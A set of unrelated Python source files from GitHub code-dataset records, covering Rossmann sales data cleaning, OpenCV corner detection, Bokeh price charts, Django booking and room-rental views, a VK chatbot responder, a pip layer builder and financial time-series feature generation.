also drop a bunch of columns that either are entirely null or\n duplciate columns, the data source seems to be a weirdly processed]\n\n Arguments:\n joined {df} -- [original df from kaggle download\n https://www.kaggle.com/init27/fastai-v3-rossman-data-clean]\n\n Returns:\n [df] -- [cleaned df]\n \"\"\"\n joined.loc[:, weather_vars] = joined.loc[:, weather_vars].fillna(\n method=\"ffill\"\n )\n\n weather_vars.append(\"Events\")\n\n # some of the initial Max_Gust_Speed Data was missing\n # so I filled with the Max_wind Speed.\n joined.loc[\n joined[\"Max_Gust_SpeedKm_h\"].isna(), \"Max_Gust_SpeedKm_h\"\n ] = joined.loc[joined[\"Max_Gust_SpeedKm_h\"].isna(), \"Max_Wind_SpeedKm_h\"]\n\n # change text data into categories, as codes.\n joined[\"Events\"] = joined[\"Events\"].astype(\"category\").cat.codes + 1\n joined[\"Store\"] = joined[\"Store\"] - 1\n joined[\"DayOfWeek\"] = joined[\"DayOfWeek\"] - 1\n joined[\"Week\"] = joined[\"Week\"] - 1\n joined[\"Assortment\"] = joined[\"Assortment\"].astype(\"category\").cat.codes\n joined[\"State\"] = joined[\"State\"].astype(\"category\").cat.codes\n joined[\"WindDirDegrees\"] = (\n joined[\"WindDirDegrees\"].astype(\"category\").cat.codes\n )\n joined[\"StoreType\"] = joined[\"StoreType\"].astype(\"category\").cat.codes\n\n # Drop variables that didn't look useful.\n joined.drop(\n [\n \"Promo2Since\",\n \"Year\",\n \"Month\",\n \"Day\",\n \"PromoInterval\",\n \"StateName\",\n \"file_DE\",\n \"State_DE\",\n \"Dayofweek_DE\",\n \"Day_DE\",\n \"Date\",\n \"Is_quarter_end\",\n \"Is_month_end_DE\",\n \"Is_year_start\",\n \"week\",\n \"file\",\n \"Month_DE\",\n \"week_DE\",\n \"Dayofyear_DE\",\n \"CompetitionOpenSince\",\n \"Date_DE\",\n \"Elapsed_DE\",\n \"CompetitionDistance\",\n ],\n axis=1,\n inplace=True,\n )\n if \"Id\" in joined.keys():\n joined.drop(\"Id\", axis=1, inplace=True)\n\n # check the keys. Make sure that we don't have a miss match\n # between keys in list and dataframe.\n a = set(joined.keys())\n total_keys = cat_vars.copy()\n total_keys.extend(cont_vars)\n b = set(total_keys)\n c = a.difference(b)\n assert not c\n\n # convert booleans to ints.\n joined[joined.select_dtypes(include=\"bool\").keys()] = joined.select_dtypes(\n include=\"bool\"\n ).astype(\"int\")\n\n # change to floats.\n joined[cont_vars] = joined[cont_vars].astype(\"float\")\n joined.dropna(0, inplace=True)\n return joined\n\n\nclass RossmanDataset(Dataset):\n \"\"\"[puts data into a useful format to be used by the dataloader]\n \"\"\"\n\n @classmethod\n def from_pickle(cls, pickle_file: str):\n \"\"\"[creates the object from pickled dict, use to load pre-processed data]\n Arguments:\n pickle_file {[str]} -- [file name of pickled Rossmann Dataset.]\n \"\"\"\n with open(pickle_file, \"rb\") as input:\n file = pickle.load(input)\n return file\n\n def to_pickle(self, output_file: str):\n \"\"\"[puts the object into a pickle file for later recovery]\n\n Arguments:\n output_file {[str]} -- [output filename]\n \"\"\"\n with open(output_file, \"wb\") as output:\n pickle.dump(self, output, pickle.HIGHEST_PROTOCOL)\n\n def __init__(\n self,\n df: pd.DataFrame,\n cont_vars: List[str],\n cat_vars: List[str],\n indices: List[int],\n scaler=MinMaxScaler(),\n ):\n\n # reading data, transforms etc..\n # column lists\n self.x_cols = df.columns.difference([\"Sales\", \"Customers\"])\n self.Y_cols = [\"Sales\", \"Customers\"]\n\n # scaler = MinMaxScaler()\n self.scaler = scaler\n\n # if statement on whether scaler has been set or not.\n if self.scaler == self.__init__.__defaults__[0]:\n\n # training case\n self.data = df.loc[indices, :].copy()\n\n # fit!!! and transform the continuous variables.\n self.data.loc[\n :, cont_vars + self.Y_cols\n ] = self.scaler.fit_transform(\n self.data.loc[:, cont_vars + self.Y_cols]\n )\n\n else:\n\n # validation case\n self.data = df.loc[indices, :].copy()\n\n # transform the continuous variables.\n self.data.loc[:, cont_vars + self.Y_cols] = self.scaler.transform(\n self.data.loc[:, cont_vars]\n )\n\n self.data.reset_index(inplace=True)\n self.data.drop([\"index\"], inplace=True, axis=1)\n\n # Make sure that the columsn have correct types\n self.x_data_cat = torch.tensor(\n self.data[cat_vars].values, dtype=torch.int\n )\n self.x_data_cont = torch.tensor(\n self.data[cont_vars].values, dtype=torch.float32\n )\n self.Y_data = torch.tensor(\n self.data[self.Y_cols].values, dtype=torch.float32\n )\n self.length = self.data.shape[0]\n\n def __getitem__(self, index):\n # returns the input and output\n return (\n self.x_data_cat[index],\n self.x_data_cont[index],\n self.Y_data[index],\n )\n\n def __len__(self):\n return self.length # of how many examples(images?) you have\n\n\nif __name__ == \"__main__\":\n\n # Example usage\n # just used the joined dataframes\n joined = pd.read_pickle(\"./data/joined\")\n\n # joined_test doesn't contain customers or sales.\n # they are the predicted variables.\n joined_test = pd.read_pickle(\"./data/joined_test\")\n\n # push through data clean function\n # i.e. drop nonesense columns and fill nans\n joined = data_clean(joined)\n\n # train valid splitting\n split_train = int(joined.shape[0] * 0.8)\n split_valid = joined.shape[0] - split_train\n train, valid = torch.utils.data.random_split(\n joined, [split_train, split_valid]\n )\n\n # create and save the training set\n train_data = RossmanDataset(joined, cont_vars, cat_vars, train.indices)\n train_data.to_pickle(\"./data/train_data.pkl\")\n\n # create and save the validation set using the scaler\n # set in the training set.\n valid_data = RossmanDataset(\n joined, cont_vars, cat_vars, valid.indices, scaler=train_data.scaler\n )\n valid_data.to_pickle(\"./data/valid_data.pkl\")\n","repo_name":"MatthewLennie/Rossmann","sub_path":"import_rossman_data.py","file_name":"import_rossman_data.py","file_ext":"py","file_size_in_byte":8646,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"70192735580","text":"import cv2\nimport numpy as np\n# # 读取图像\n# def get_edge_contour(img):\n# threshold1 = 100\n# threshold2 = 200\n# len_threshold = 2\n# edges = cv2.Canny(img, threshold1, threshold2)\n\n# cv2.imwrite('edges.png', edges)\n\n# # 查找轮廓\n# contours, _ = cv2.findContours(edges, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n\n \n# # 显示所有轮廓\n# mask = np.zeros(img.shape)\n# for c in contours:\n# # 过滤小面积\n# if (cv2.contourArea(c) < len_threshold ** 2):\n# continue\n \n# cv2.drawContours(img, [c], 0, (0, 255, 0), 1)\n \n# cv2.imwrite('contours.png', img)\n\n\ndef color_edge(img):\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n height, width, _ = img.shape\n scale = (height + width)/2\n \n # cv2.imshow(\"hsv\", hsv)\n minBlue = np.array([100, 15, 46])\n maxBlue = np.array([124, 255, 255])\n \n # 确定蓝色区域\n mask = cv2.inRange(hsv, minBlue, maxBlue)\n # cv2.imwrite(\"mask.png\", mask)\n \n # 通过按位与获取蓝色区域\n blue_img = cv2.bitwise_and(img, img, mask=mask)\n cv2.imwrite(\"blue.png\", blue_img)\n\n # 将mask进行形态学处理消除内部外部的噪点\n kernel_size1 = int(scale / 60)\n kernel_size2 = int(scale / 16)\n if kernel_size1 == 0 or kernel_size2 == 0:\n return None\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT,(kernel_size1,kernel_size1))\n kernel2 = cv2.getStructuringElement(cv2.MORPH_RECT,(kernel_size2,kernel_size2))\n #定义矩形结构元素\n # erode1 = cv2.erode(mask,kernel,iterations=1)\n # cv2.imwrite(\"erode1.png\", erode1)\n open0 = cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel,iterations=2)\n cv2.imwrite(\"open0.png\", open0)\n \n closed1 = cv2.morphologyEx(open0, cv2.MORPH_CLOSE, kernel2,iterations=2)\n cv2.imwrite(\"closed1.png\", closed1)\n\n open1 = cv2.morphologyEx(closed1, cv2.MORPH_OPEN, kernel2,iterations=2)\n cv2.imwrite(\"open1.png\", open1)\n\n # 提取边界\n ret, binary = cv2.threshold(open1,127,255,cv2.THRESH_BINARY)\n\n binary = np.float32(binary)\n dst = cv2.cornerHarris(binary,4,5,0.04)\n dst = cv2.dilate(dst,None)\n # dst: height * width\n \n candidate_pos = np.array(np.where(dst > 0.2 * dst.max())).transpose()\n if candidate_pos.shape[0] == 0:\n return None\n # pos[0]->height pos[1]->width\n left_top = candidate_pos[0]\n right_top = candidate_pos[0]\n left_bottom = candidate_pos[0]\n right_bottom = candidate_pos[0]\n # 遍历每个点,找到距离四角最近的点\n # 计算四个角点的坐标\n pos_plus = candidate_pos[:, 0] + candidate_pos[:, 1]\n pos_minus = candidate_pos[:, 0] - candidate_pos[:, 1]\n left_top_arg = np.argmin(pos_plus)\n right_bottom_arg = np.argmax(pos_plus)\n left_bottom_arg = np.argmax(pos_minus)\n right_top_arg = np.argmin(pos_minus)\n\n left_top = candidate_pos[left_top_arg]\n right_bottom = candidate_pos[right_bottom_arg]\n left_bottom = candidate_pos[left_bottom_arg]\n right_top = candidate_pos[right_top_arg]\n \n return [left_top, right_top, left_bottom, right_bottom] \n\n\n\n\nif __name__ == \"__main__\":\n # img = cv2.imread('0.png', cv2.THRESH_BINARY)\n # cv2.imwrite('1.png', img)\n # get_edge_contour(img)\n img = cv2.imread('0.png')\n color_edge(img)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n\n","repo_name":"yangjh155/Unet","sub_path":"edge_contour.py","file_name":"edge_contour.py","file_ext":"py","file_size_in_byte":3366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"12221790830","text":"import pandas as pd\nfrom bokeh.plotting import figure, output_file, show\nfrom bokeh.layouts import column\n\noutput_file('index.html')\np = []\nindex = 0\ngranularities = ['day', 'month', 'year']\nTOOLS = 'pan,box_zoom,wheel_zoom,box_select,hover,resize,reset,save'\n\nfor item in granularities:\n data = pd.read_csv('../data/' + item + '.csv', parse_dates=['Date'])\n\n p.append(figure(title='This chart is generated using Bokeh library',\n width=900, height=500, x_axis_type=\"datetime\", tools=TOOLS))\n\n p[index].line(data['Date'], data['Price'], line_width=2)\n\n p[index].circle(data['Date'], data['Price'], fill_color=\"white\", size=6)\n\n p[index].xaxis[0].axis_label = 'Date'\n p[index].yaxis[0].axis_label = 'Price in USD'\n index += 1\n\nshow(column(p[0], p[1], p[2]))\n","repo_name":"datopian/line-charts","sub_path":"bokeh/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"11630598699","text":"from django.urls import path\nfrom . import views\n\napp_name = 'core'\n\nurlpatterns = [\n \n path('', views.index_views, name='home'),\n \n path('events/information', views.event_views, name='info'),\n \n path('booking/bus/search/', views.add_to_bookings, name='addhire'),\n \n path('bus/register', views.bus_hire_view, name='bookbus'),\n \n path('aboutus', views.aboutUs_page, name='about'),\n \n path('faQ', views.faQ_page, name='faQ'),\n \n path('booking/bus/search', views.SearchView.as_view(), name='searchpath'),\n \n path('booking/', views.BookingBusDetail.as_view(), name='bookingdetail'),\n \n path(\"booking/bus/direction//\", views.DirectionDetail.as_view(), name=\"direction_detail\"),\n\n # path('hiring', views.hirebus, name='hiringbus'),\n\n # path('booking', booking_views, name='book'),\n \n # path(\n \n # \"informaa1276765433niaganalanajanaanaianau34aranaeanawana324apanaoana456543akanqanyana56banatanhanaban45456774\",\n\n # name='booked'\n \n # )\n \n]\n","repo_name":"metalcode03/BusBuggy","sub_path":"core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"29574803218","text":"from wiki import Wiki\nclass Commander:\n hello = [\"hello\",\"ghbdtn\",\"привет\",\"хай\"]\n whatsup = [\"че как\",\"че как?\", \"как дела\",\"как дела?\"]\n wiki = [\"wiki\", \"википедия\",\"вики\"]\n last_msg = \"\"\n def ans(self,text:str):\n text = text.lower()\n if self.last_msg == \"вики\":\n w = Wiki()\n self.last_msg = \"\"\n return w.get_wiki(text)\n\n for i in self.hello:\n if text == i:\n self.last_msg = \"\"\n return \"Привет, я БОТ_ИМЯ!\\nЯ умею присылать статью из Википедии(напиши: вики или wiki)\"\n\n for i in self.whatsup:\n if text == i:\n self.last_msg = \"\"\n return \"У меня всгда все круто, я же рообот\\nА у тебя как дела?\"\n\n for i in self.wiki:\n if text == i:\n self.last_msg = \"вики\"\n return \"Что ты хочешь узнать?\"\n\n return \"Я тебя не понял\"\n","repo_name":"temsiPatrin/vk_bot_super","sub_path":"commander.py","file_name":"commander.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"41674512056","text":"from django.forms.forms import Form\nfrom django.urls.base import reverse_lazy\nfrom django.views.generic import ListView, DetailView, UpdateView, FormView, View\nfrom django.shortcuts import get_object_or_404, render, redirect\nfrom django.urls import reverse\nfrom django.utils import timezone\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\nfrom django.http import Http404\nfrom django.contrib.messages.views import SuccessMessageMixin\nfrom django.views.generic.edit import CreateView\nfrom django_countries import countries\nfrom rooms import forms, models as room_model\nfrom reservations import models as res_model\nfrom rooms import forms as room_form\nfrom users import mixins\nfrom users.mixins import LoggedInOnlyView\n\n\n# from django.http import HttpResponse # django translate the request\n# Create your views here.\n\n\nclass HomeView(ListView):\n\n \"\"\"Home View Definition\"\"\"\n\n model = room_model.Room\n paginate_by = 12\n context_object_name = \"page\"\n ordering = \"created\"\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n now = timezone.now() # get_context_data search in doc\n context[\"now\"] = now\n return context\n\n\ndef room_detail(request, pk):\n try:\n room = room_model.Room.objects.get(pk=pk)\n reservations = res_model.Reservation.objects.filter(room=room)\n for reservation in reservations:\n if reservation.is_finished():\n reservation.delete()\n return render(request, \"rooms/detail.html\", context={\"room\": room})\n except room_model.Room.DoesNotExist:\n # return redirect(reverse(\"core:home\")) # reverse returns url\n raise Http404()\n\n\n# class ModelNameDetail(DetailView):\n# model = room_model.Room\n# pk_url_kwarg=\"pk\"\n# you don't need to raise the http 404~\n# to more customize this, look it up on the CCBV\n\n\nclass EditRoomView(LoggedInOnlyView, UpdateView):\n model = room_model.Room\n template_name = \"rooms/room_edit.html\"\n fields = (\n \"name\",\n \"description\",\n \"country\",\n \"city\",\n \"price\",\n \"address\",\n \"guests\",\n \"beds\",\n \"bedrooms\",\n \"bath\",\n \"check_in\",\n \"check_out\",\n \"instant_book\",\n \"room_type\",\n \"amenity\",\n \"facility\",\n \"house_rule\",\n )\n\n def get_object(self, queryset=None):\n room = super().get_object(queryset=queryset)\n if room.host.pk != self.request.user.pk:\n raise Http404()\n return room\n\n\nclass UploadRoomView(FormView, mixins.LoggedInOnlyView):\n form_class = room_form.CreateRoomForm\n template_name = \"rooms/room_create.html\"\n\n def form_valid(self, form):\n room = form.save()\n room.host = self.request.user\n room.save()\n form.save_m2m()\n return redirect(reverse(\"rooms:detail\", kwargs={\"pk\": room.pk}))\n\n\nclass RoomPhotosView(DetailView):\n model = room_model.Room\n template_name = \"rooms/room_photos.html\"\n\n def get_object(self, queryset=None): # override\n room = super().get_object(queryset=queryset)\n if room.host.pk != self.request.user.pk:\n raise Http404()\n return room\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n rooms = room_model.Room.objects.all()\n context[\"rooms\"] = rooms\n return context\n\n\n# class SearchView(View):\n# def get(self, request):\n\n# country = request.GET.get(\"country\")\n\n# if country:\n\n# form = forms.SearchForm(request.GET)\n\n# if form.is_valid():\n\n# city = form.cleaned_data.get(\"city\")\n# country = form.cleaned_data.get(\"country\")\n# room_type = form.cleaned_data.get(\"room_type\")\n# price = form.cleaned_data.get(\"price\")\n# guests = form.cleaned_data.get(\"guests\")\n# bedrooms = form.cleaned_data.get(\"bedrooms\")\n# beds = form.cleaned_data.get(\"beds\")\n# baths = form.cleaned_data.get(\"baths\")\n# instant_book = form.cleaned_data.get(\"instant_book\")\n# superhost = form.cleaned_data.get(\"superhost\")\n# amenities = form.cleaned_data.get(\"amenities\")\n# facilities = form.cleaned_data.get(\"facilities\")\n\n# filter_args = {}\n\n# if city != \"Anywhere\":\n# filter_args[\"city__startswith\"] = city\n\n# filter_args[\"country\"] = country\n\n# if room_type is not None:\n# filter_args[\"room_type\"] = room_type\n\n# if price is not None:\n# filter_args[\"price__lte\"] = price\n\n# if guests is not None:\n# filter_args[\"guests__gte\"] = guests\n\n# if bedrooms is not None:\n# filter_args[\"bedrooms__gte\"] = bedrooms\n\n# if beds is not None:\n# filter_args[\"beds__gte\"] = beds\n\n# if baths is not None:\n# filter_args[\"baths__gte\"] = baths\n\n# if instant_book is True:\n# filter_args[\"instant_book\"] = True\n\n# if superhost is True:\n# filter_args[\"host__superhost\"] = True\n\n# for amenity in amenities:\n# filter_args[\"amenities\"] = amenity\n\n# for facility in facilities:\n# filter_args[\"facilities\"] = facility\n\n# rooms = room_model.Room.objects.filter(**filter_args)\n\n# else:\n\n# form = forms.SearchForm()\n\n# return render(request, \"rooms/search.html\", {\"form\": form, \"rooms\": rooms})\n\n\ndef Search(request):\n city = request.GET.get(\"city\", \"anywhere\")\n room_type = int(request.GET.get(\"room_type\", 0))\n room_types = room_model.RoomType.objects.all()\n country = request.GET.get(\"country\", \"KR\")\n price = int(request.GET.get(\"price\", 0))\n guests = int(request.GET.get(\"guests\", 0))\n beds = int(request.GET.get(\"beds\", 0))\n bedrooms = int(request.GET.get(\"bedrooms\", 0))\n bath = int(request.GET.get(\"bath\", 0))\n\n amenities = room_model.Amenity.objects.all()\n facilities = room_model.Facility.objects.all()\n form = {\n \"city\": city,\n \"s_room_type\": room_type, # from database\n \"s_country\": country,\n \"price\": price,\n \"guests\": guests,\n \"beds\": beds,\n \"bedrooms\": bedrooms,\n \"bath\": bath,\n }\n choices = {\n \"countries\": countries,\n \"room_types\": room_types,\n \"amenities\": amenities,\n \"facilities\": facilities,\n }\n filter_args = {}\n if city != \"anywhere\":\n filter_args[\"city__startswith\"] = city\n filter_args[\"country\"] = country\n if room_type != 0:\n filter_args[\"room_type__pk\"] = room_type\n if price != 0:\n filter_args[\"price__lte\"] = price # refer to lookup session on documentation\n if guests != 0:\n filter_args[\"guests__gte\"] = guests\n if beds != 0:\n filter_args[\"beds__gte\"] = beds\n if bedrooms != 0:\n filter_args[\"bedrooms__gte\"] = bedrooms\n if bath != 0:\n filter_args[\"bath__gte\"] = bath\n rooms = room_model.Room.objects.filter(**filter_args)\n return render(\n request,\n template_name=\"rooms/search.html\",\n context={**form, **choices, \"rooms\": rooms},\n )\n\n\n@login_required\ndef delete_photo(request, room_pk, photo_pk):\n user = request.user\n try:\n room = room_model.Room.objects.get(pk=room_pk)\n if user.pk != room.host.pk:\n messages.error(request, \"can't delete that photo\")\n else:\n photo = room_model.Photo.objects.get(pk=photo_pk)\n photo.delete()\n messages.success(request, \"Photo is successfully deleted\")\n return redirect(reverse(\"rooms:photos\", kwargs={\"pk\": room_pk}))\n\n except room_model.Room.DoesNotExist:\n return redirect(reverse(\"core:home\"))\n\n\nclass EditPhotoView(mixins.LoggedInOnlyView, UpdateView):\n model = room_model.Photo\n template_name = \"rooms/photo_edit.html\"\n fields = (\"caption\",)\n pk_url_kwarg = \"photo_pk\"\n success_message = \"Photo_updated\"\n\n def get_success_url(self):\n room_pk = self.kwargs.get(\"room_pk\")\n return reverse(\"rooms:photos\", kwargs={\"pk\": room_pk})\n\n\nclass AddPhotoView(mixins.LoggedInOnlyView, FormView, SuccessMessageMixin):\n model = room_model.Photo\n template_name = \"rooms/photo_create.html\"\n form_class = forms.CreatePhotoForm\n\n def form_valid(self, form):\n pk = self.kwargs.get(\"pk\")\n form.save(pk)\n messages.success(self.request, \"Photo Uploaded\")\n return redirect(reverse(\"rooms:photos\", kwargs={\"pk\": pk}))\n","repo_name":"glauke1996/airbnb-clone","sub_path":"airbnb_project/rooms/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"74401199270","text":"import os\nimport subprocess\nimport sys\nfrom .base_handler import BaseHandler\nimport logging\n\n\nlogging.basicConfig(level=logging.ERROR)\nPATH = \"python/lib/python3.8/site-packages\"\n\n\nclass PipHandler(BaseHandler):\n def __init__(self, cli) -> None:\n super().__init__(cli=cli)\n self._build_dirs()\n\n def _build_dirs(self) -> None:\n os.makedirs(PATH, exist_ok=True)\n\n def install_dependencies(self) -> None:\n for dependencie in self.configs[\"libraries\"]:\n try:\n subprocess.check_call(\n [sys.executable, \"-m\", \"pip\", \"install\", dependencie, \"-t\", PATH]\n )\n except subprocess.CalledProcessError:\n continue\n","repo_name":"brianamaral/aws_layer_publisher","sub_path":"layer_builder/pip_handler.py","file_name":"pip_handler.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"42787209056","text":"#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n# See the GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License along\n# with this program; if not, write to the Free Software Foundation, Inc.,\n# 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA\n#\n# Author: Matthew Dixon, Diego Klabjan, Jin Hoon Bang\n# Description: Given multiple time series data in (M x 2) CSV format, this script\n# generates label (-1, 0, 1) and features (lagging price, moving averages, correlation)\n# In the input time series data, the first column is time stamp and the second oolumn is price.\n# In the current path, there are 43 symbols (43 different time series data).\n# Two files per symbol are generated: *_large.bin and *_small.bin. The two files differ\n# in number of datapoints that they contain.\n# For lagging and moving averages, normalized price values are used.\n# For calculating correlation between each symbol, return price value is used.\n\n\nimport pandas as pd\nimport glob\nimport numpy as np\nimport os\nimport sys\nimport math\nimport random\n\npd.set_option('precision', 15)\n\nparams = dict(\n path = os.path.join(os.path.expanduser('~'), 'data', 'csv', '*'),\n min_lagging = 1,\n max_lagging = 100,\n #interval_lagging = 1, #not implemented\n min_moving_average = 2,\n max_moving_average = 100,\n #interval_moving_average = 1, #not implemented\n list_epsilon = [0.01, 0.001, 0.0001, 0.00001, 0.000001, 0.0000001,0.00000001],\n theta = 0.001,\n max_correlation_window = 100,\n stock_count = 43,\n small_output_size = 50000,\n)\n\n#get paths to all files in 'file_path'\ninput_files = []\nfor file in glob.glob(params['path']):\n input_files.append(file)\ninput_files.sort()\n\n#find the symbol with the lowest number of datapoints\n#number of datapoints in the output is limited by the symbol with the lowest number of datapoints.\nlist_n = []\nfor file in input_files:\n df = pd.read_csv(file, header=None, dtype='float64')\n list_n.append(len(df))\nmin_n = min(list_n)\nprint(\"min_n:\", min_n)\n\n#dataframes for accumulating normalized price and return price across all symbols\ndf_normalized = pd.DataFrame(dtype='float64')\ndf_return = pd.DataFrame(dtype='float64')\n\nfor file in input_files:\n df = pd.read_csv(file, names=['Timestamp', 'Price'], header=None, dtype='float64')\n df = df.ix[:min_n]\n series_price = df.Price\n series_return = pd.Series(index = df.index, name=\"Return\"+file, dtype='float64')\n\n #generate return price\n for i in range(0, min_n - 1):\n series_return[i] = (series_price[i+1]-series_price[i])/series_price[i]\n series_return = series_return.dropna()\n df_return = pd.concat([df_return, series_return], axis=1)\n\n #generate normalized price\n meanPrice = np.mean(series_price)\n stdPrice = np.std(series_price)\n\n series_normalized = pd.Series(index=series_price.index, name=\"PriceNormalized\"+file, dtype='float64')\n\n for i in range(0, min_n):\n series_normalized[i] = (series_price[i]-meanPrice)/stdPrice\n df_normalized = pd.concat([df_normalized, series_normalized], axis=1)\n\n print(\"len(series_normalized)\",len(series_normalized))\n print(\"len(series_return)\", len(series_return))\n\nfor j in range(0, params['stock_count']):\n outputDataFrame = pd.DataFrame(dtype='float64')\n\n currNormalized = df_normalized.ix[:,j]\n currReturn = df_return.ix[:,j]\n currentFile = input_files[j]\n\n diffSquared = []\n #label = 1 and -1 represent increase/decrease in price. If the difference is\n #lower than epsilon, then label =0\n #In order to balance the labels as much as possible, different values of\n #epsilon are experimented and the one that balances the three classes as equally\n #as possible is chosen\n\n for eps in params['list_epsilon']:\n positive = 0\n neutral = 0\n negative = 0\n for i in range (0, min_n-1):\n difference = currNormalized[i+1]-currNormalized[i]\n if (difference>eps):\n positive = positive + 1\n elif (difference < (-1)*eps):\n negative = negative + 1\n else:\n neutral = neutral + 1\n total = positive + negative + neutral\n target = total / 3\n diffSquared.append((positive-target)**2+(negative-target)**2+(neutral-target)**2)\n print(\"epsilon:\", eps)\n print(\"positive:\", positive, positive/total)\n print(\"negative\", negative, negative/total)\n print(\"neutral\", neutral, neutral/total)\n print(\"\")\n\n balEpsilon = params['list_epsilon'][np.argmin(diffSquared)]\n print(\"Selected epsilon\", balEpsilon)\n print(\"\")\n\n seriesLabel = pd.Series(index=currNormalized.index, name=\"Label\"+str(balEpsilon)+currentFile, dtype='float64')\n for i in range (0, min_n-1):\n difference = currNormalized[i+1]-currNormalized[i]\n if (difference>balEpsilon):\n seriesLabel[i]=1\n elif (difference<(-1)*balEpsilon):\n seriesLabel[i]=-1\n else:\n seriesLabel[i]=0\n\n outputDataFrame=pd.concat([outputDataFrame, seriesLabel],axis=1)\n\n #generates lagging columns using normalized price,\n for i in range(1,params['max_lagging']+1):\n seriesLagged = pd.Series(currNormalized.shift(i), index=currNormalized.index, name=\"Lagging \"+str(i)+currentFile, dtype='float64')\n outputDataFrame=pd.concat([outputDataFrame,seriesLagged],axis=1)\n\n #generates moving averages normalized price\n for i in range (params['min_moving_average'], params['max_moving_average']+1):\n seriesMovingAverage = currNormalized\n seriesMovingAverage = pd.rolling_mean(seriesMovingAverage, i)\n seriesMovingAverage = pd.Series(seriesMovingAverage, index=seriesMovingAverage.index, name=\"Moving Average\"+str(i)+currentFile, dtype='float64')\n outputDataFrame = pd.concat([outputDataFrame, seriesMovingAverage], axis=1)\n\n #calculates correlation with different symbols using moving windows.\n #adds very small values of perturbation to avoid division by zero while\n #calculating correlation.\n\n for k in range (j+1, params['stock_count']):\n u = (params['theta'] * balEpsilon)/math.sqrt(params['max_correlation_window'])\n compareFile = input_files[k]\n\n xPrice = currReturn\n yPrice = df_return.ix[:,k]\n xTemp = pd.Series(dtype='float64')\n yTemp = pd.Series(dtype='float64')\n xTemp = xPrice.apply(lambda x: u*(random.uniform(-1,1)))\n yTemp = yPrice.apply(lambda x: u*(random.uniform(-1,1)))\n xPrice = xPrice.add(xTemp)\n yPrice = yPrice.add(yTemp)\n\n seriesCorrelation = pd.Series(index=outputDataFrame.index, name=\"Correlation\"+currentFile+\" VS \"+compareFile, dtype='float64')\n\n for i in range(params['max_correlation_window'], min_n):\n correlation = np.corrcoef(xPrice[i-(params['max_correlation_window'] - 1) : i], yPrice[i-(params['max_correlation_window'] - 1) : i], bias = 1)[0][1]\n seriesCorrelation[i] = correlation\n\n outputDataFrame = pd.concat([outputDataFrame, seriesCorrelation], axis=1)\n\n #two output files are prepared\n #size of the ouput is n_min calculated initially\n #size of small output set is defined in params\n\n outputDataFrame = outputDataFrame.dropna()\n smallDataFrame = outputDataFrame.tail(params['small_output_size'])\n\n file = os.path.splitext(currentFile)[0]\n\n dimension = np.array([len(outputDataFrame), len(outputDataFrame.columns)])\n smallDimension = np.array([params['small_output_size'], len(outputDataFrame.columns)])\n\n print(\"dimensions for: \", currentFile)\n print(\"number of rows:\", len(outputDataFrame))\n print(\"number of columns: \", len(outputDataFrame.columns))\n print(\"\")\n\n #append dimension (n_row, n_column) to beginning of file and export to binary\n outputArray = outputDataFrame.as_matrix()\n outputArray=np.append(dimension,outputArray)\n outputArray.astype('float64')\n outputArray.tofile(file+'_large.bin')\n smallOutputArray = smallDataFrame.as_matrix()\n smallOutputArray=np.append(smallDimension,smallOutputArray)\n smallOutputArray.astype('float64')\n smallOutputArray.tofile(file+'_small.bin')\n\n #for outputting to csv format\n # outputDataFrame.to_csv(file+'_largeHybrid.csv',index=False)\n # smallDataFrame.to_csv(file+'_smallHybrid.csv',index=False)\n\n\n\n\n\n","repo_name":"jinhoonbang/python_machine_learning","sub_path":"src/feature_engineering/generate_features.py","file_name":"generate_features.py","file_ext":"py","file_size_in_byte":8777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
